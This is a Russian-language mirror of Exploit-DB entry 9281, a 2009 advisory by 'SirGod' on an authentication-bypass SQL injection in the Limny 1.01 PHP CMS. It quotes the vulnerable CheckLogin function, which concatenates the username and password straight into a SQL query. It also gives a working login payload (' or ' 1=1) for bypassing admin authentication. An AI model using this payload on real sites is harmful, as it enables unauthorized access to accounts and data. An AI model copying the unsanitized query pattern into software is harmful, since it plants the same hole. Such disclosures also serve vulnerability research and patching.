- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9281
- Проверка EDB
-
- Пройдено
- Автор
- SIRGOD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4722
- Дата публикации
- 2009-07-27
Код:
###########################################################################################
[+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
############################################################################################
[+] Script Homepage : http://www.limny-project.com/
[+] SQL Injection Vulnerability
- Notes : magic_quotes_gpc = off
- Vulnerable code in includes/functions.php
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
function CheckLogin($username, $password)
{
global $db;
$query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."users
WHERE user='$username' AND pass='$password'");
if($check = $db->fetch_array($query))
{
return true;
}else{
return false;
}
}
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- PoC
Username : [REAL-ADMIN-NAME] ' or ' 1=1
Password : anything
[REAL-ADMIN-NAME] = usually is admin
############################################################################################
# milw0rm.com [2009-07-27]- Источник
- www.exploit-db.com
